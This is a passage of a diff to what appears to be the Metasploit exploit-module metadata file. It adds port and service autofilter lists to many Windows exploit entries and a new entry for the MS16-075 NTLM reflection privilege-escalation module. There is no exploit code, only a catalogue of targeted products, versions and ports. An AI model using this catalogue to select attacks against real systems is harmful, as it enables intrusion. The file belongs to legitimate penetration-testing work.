"Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English SP0-SP1" ], @@ -85009,6 +110705,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -85043,6 +110745,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English SP0", "Windows 2000 Pro English SP1-SP2" @@ -85079,6 +110787,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT 4.0 SP3", "Windows NT 4.0 SP4", @@ -85116,6 +110830,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 Pro English SP0" ], @@ -85150,6 +110879,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Brute Force" ], @@ -85185,6 +110929,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -85219,6 +110978,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "WorldMail 3 Version 6.1.19.0", @@ -85255,6 +111020,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP sp0 comctl32.dll" ], @@ -85288,6 +111059,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows 2003 SP0 English" @@ -85322,6 +111099,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MailEnable 2.35 Pro", "MailEnable 2.34 Pro" @@ -85357,6 +111140,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MailEnable 1.54 Pro Universal", "Windows XP Pro SP0/SP1 English", @@ -85393,6 +111182,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MailEnable 1.54 Pro Universal" ], @@ -85426,6 +111221,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MDaemon IMAP 8.0.3 Windows XP SP2" ], @@ -85461,6 +111262,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MDaemon Version 9.6.4" ], @@ -85494,6 +111301,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Server SP4 English", "Windows 2000 Pro SP1 English" @@ -85529,6 +111342,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP2 English" @@ -85562,6 +111381,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English", "Windows XP Pro SP0/SP1 English" @@ -85597,6 +111422,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP4 English", @@ -85634,6 +111465,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85665,6 +111502,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85698,6 +111541,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85732,6 +111581,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85766,6 +111621,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP1", "Windows 2000 SP0", @@ -85803,6 +111673,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Brute Force", "Windows 2000 -MS03-019", @@ -85840,6 +111725,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP0-SP3", "Windows 2000 07/22/02", @@ -85874,6 +111774,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "RSA WebAgent 5.2", "RSA WebAgent 5.3", @@ -85917,6 +111832,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Detection", "Windows 2000 RESKIT DLL [Windows 2000]", @@ -85953,6 +111883,12 @@ "platform": "Windows", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English", "Windows 2000 IMail 8.x" @@ -85988,6 +111924,12 @@ "platform": "Windows", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal PGPcertd.exe" ], @@ -86023,6 +111965,12 @@ "platform": "Windows", "arch": "", "rport": 10203, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English", @@ -86062,6 +112010,12 @@ "platform": "Windows", "arch": "", "rport": 10202, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English", @@ -86104,6 +112058,12 @@ "platform": "Windows", "arch": "", "rport": 27000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Debug", "Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3", @@ -86140,6 +112100,12 @@ "platform": "Windows", "arch": "", "rport": 5093, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6", @@ -86179,6 +112145,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader X 10.1.4 / Windows 7 SP1" ], @@ -86212,6 +112184,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Agnitum Outpost Internet Security 8.1" ], @@ -86247,10 +112225,16 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 10 x64" ], - "mod_time": "2018-09-21 12:30:36 +0000", + "mod_time": "2018-09-26 21:13:37 +0000", "path": "/modules/exploits/windows/local/alpc_taskscheduler.rb", "is_install_path": true, "ref_name": "windows/local/alpc_taskscheduler", @@ -86258,6 +112242,12 @@ "post_auth": false, "default_credential": false, "notes": { + "Stability": [ + "os-resource-loss" + ], + "Reliability": [ + "repeatable-session" + ] } }, "exploit_windows/local/always_install_elevated": { @@ -86281,6 +112271,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86313,6 +112309,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86345,6 +112347,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86380,6 +112388,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -86413,6 +112427,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86448,6 +112468,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -86481,6 +112507,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86514,6 +112546,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86551,6 +112589,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86583,6 +112627,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86616,6 +112666,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86649,6 +112705,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -86681,6 +112743,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64 (<= 10)" ], @@ -86715,6 +112783,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -86753,6 +112827,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64", "Windows x86" @@ -86786,6 +112866,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86819,6 +112905,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86854,6 +112946,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86892,6 +112990,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -86926,6 +113030,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -86964,6 +113074,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2K SP4 - Windows 7 (x86)" ], @@ -86999,6 +113115,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Vista, 7, and 2008" ], @@ -87035,6 +113157,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP2 / SP3", @@ -87073,6 +113201,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87110,6 +113244,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP0/SP1" ], @@ -87149,6 +113289,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP0/SP1" ], @@ -87184,6 +113330,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 - 11" ], @@ -87219,6 +113371,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 - 11" ], @@ -87257,6 +113415,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87294,6 +113458,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Server 2003 SP2" ], @@ -87329,6 +113499,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Protected Mode (Windows 7) / 32 bits" ], @@ -87367,6 +113543,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87409,6 +113591,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 8.1 x64" ], @@ -87446,6 +113634,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP0/SP1" ], @@ -87479,6 +113673,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1" ], @@ -87515,6 +113715,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87529,6 +113735,51 @@ "notes": { } }, + "exploit_windows/local/ms16_075_reflection": { + "name": "Windows Net-NTLMv2 Reflection DCOM/RPC", + "full_name": "exploit/windows/local/ms16_075_reflection", + "rank": 300, + "disclosure_date": "2016-01-16", + "type": "exploit", + "author": [ + "FoxGloveSec", + "breenmachine", + "Mumbai" + ], + "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.", + "references": [ + "MSB-MS16-075", + "CVE-2016-3225", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", + "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "URL-https://github.com/breenmachine/RottenPotatoNG" + ], + "is_server": true, + "is_client": false, + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Automatic", + "Windows x86", + "Windows x64" + ], + "mod_time": "2018-10-04 16:38:35 +0000", + "path": "/modules/exploits/windows/local/ms16_075_reflection.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_075_reflection", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_windows/local/ms_ndproxy": { "name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation", "full_name": "exploit/windows/local/ms_ndproxy", @@ -87559,6 +113810,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3", @@ -87596,6 +113853,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 7 SP1" @@ -87631,6 +113894,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3" @@ -87668,6 +113937,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 8 / Windows 8.1 (x86 and x64)" ], @@ -87702,6 +113977,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -87734,6 +114015,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87767,6 +114054,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -87799,6 +114092,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -87830,6 +114129,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -87862,6 +114167,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -87904,6 +114215,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -87936,6 +114253,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -87967,6 +114290,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -87998,6 +114327,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -88030,6 +114365,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -88061,6 +114402,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88093,6 +114440,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88126,6 +114479,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -88157,6 +114516,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88189,6 +114554,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -88222,6 +114593,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -88258,6 +114635,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)" ], @@ -88290,6 +114673,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7" ], @@ -88323,6 +114712,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88355,6 +114750,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -88390,6 +114791,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Lotus Domino 7.0 on Windows 2003 SP1 English(NX)", @@ -88432,6 +114848,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lotus Domino 8.5 on Windows 2000 SP4", "Lotus Domino 8.5 on Windows Server 2003 SP0", @@ -88469,6 +114891,12 @@ "platform": "Windows", "arch": "x86", "rport": 1533, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lotus Sametime 7.5 on Windows Server 2000 SP4", "Lotus Sametime 7.5 on Windows Server 2003 SP1", @@ -88509,6 +114937,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" @@ -88543,6 +114983,12 @@ "platform": "Windows", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English SP0-SP4", @@ -88579,6 +115025,12 @@ "platform": "Windows", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NIPrint3.EXE (TDS:0x3a045ff2)", "Windows XP SP3", @@ -88614,6 +115066,12 @@ "platform": "Windows", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SAPlpd 6.28.0.1 (SAP Release 6.40)" ], @@ -88647,6 +115105,12 @@ "platform": "Windows", "arch": "", "rport": 13500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinComLPD 3.0.2.623" ], @@ -88679,6 +115143,12 @@ "platform": "Windows", "arch": "", "rport": 9256, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1" ], @@ -88715,6 +115185,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ActFax 5.01 / Windows XP SP3" ], @@ -88748,6 +115224,12 @@ "platform": "Windows", "arch": "", "rport": 705, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Helix Server v12 and v13 - master.exe" ], @@ -88783,6 +115265,12 @@ "platform": "Windows", "arch": "", "rport": 888, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ALLMediaServer 0.8 / Windows XP SP3 - English", "ALLMediaServer 0.8 / Windows 7 SP1 - English" @@ -88819,6 +115307,12 @@ "platform": "Windows", "arch": "", "rport": 402, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 (with tftp client available)" ], @@ -88853,6 +115347,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "QuickTime 7.3, QuickTime Player 7.3" ], @@ -88886,6 +115386,12 @@ "platform": "Windows", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Asus Dpcroxy version 2.00.19 Universal" ], @@ -88924,6 +115430,12 @@ "platform": "Windows", "arch": "", "rport": 3217, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Avaya WinPMD 3.8.2 / Windows XP SP3", "Avaya WinPMD 3.8.2 / Windows 2003 SP2" @@ -88958,6 +115470,12 @@ "platform": "Windows", "arch": "", "rport": 4659, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Professional SP3" ], @@ -88992,6 +115510,12 @@ "platform": "Windows", "arch": "", "rport": 20031, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP4 English", @@ -89030,6 +115554,12 @@ "platform": "Windows", "arch": "", "rport": 16102, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BCAAA Version 5.4.6.1.54128" ], @@ -89063,6 +115593,12 @@ "platform": "Windows", "arch": "", "rport": 6080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro All English", "Windows XP Pro SP0/SP1 English" @@ -89098,6 +115634,12 @@ "platform": "Windows", "arch": "", "rport": 6660, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt 2.5 Universal", "Windows 2000 Pro All English", @@ -89135,6 +115677,12 @@ "platform": "Windows", "arch": "", "rport": 6661, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt Server 2.97 SP7" ], @@ -89170,6 +115718,12 @@ "platform": "Windows", "arch": "", "rport": 6661, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt Server 2.97 SP7 / Windows XP SP3", "BigAnt Server 2.97 SP7 / Windows 2003 SP2" @@ -89207,6 +115761,12 @@ "platform": "Windows", "arch": "", "rport": 6660, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt 2.52 Universal" ], @@ -89240,6 +115800,12 @@ "platform": "Windows", "arch": "", "rport": 11000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP2 Italian", @@ -89277,6 +115843,12 @@ "platform": "Windows", "arch": "", "rport": 19810, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Bopup Communications Server 3.2.26.5460" ], @@ -89310,6 +115882,12 @@ "platform": "Windows", "arch": "", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English All / Borland InterBase 2007" ], @@ -89343,6 +115921,21 @@ "platform": "Windows", "arch": "", "rport": 3057, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP4 English", "Windows 2003 SP0 English" @@ -89378,6 +115971,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista" ], @@ -89413,6 +116012,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89447,6 +116052,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89481,6 +116092,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89517,6 +116134,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89550,6 +116173,12 @@ "platform": "Windows", "arch": "", "rport": 8888, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CloudMe Sync v1.10.9" ], @@ -89582,6 +116211,12 @@ "platform": "Windows", "arch": "", "rport": 8400, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Commvault Communications Service (cvd) / Microsoft Windows 7 and higher" ], @@ -89613,6 +116248,12 @@ "platform": "Windows", "arch": "", "rport": 9124, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Disk Savvy Enterprise v10.4.18" ], @@ -89645,6 +116286,12 @@ "platform": "Windows", "arch": "", "rport": 1100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "doubletake 4.5.0", "doubletake 4.4.2", @@ -89683,6 +116330,12 @@ "platform": "Windows", "arch": "", "rport": 10616, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "EnterpriseSecurityAnalyzerv21 Universal", @@ -89738,6 +116391,12 @@ "platform": "Windows", "arch": "", "rport": 10628, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP4 English", @@ -89777,6 +116436,12 @@ "platform": "Windows", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], 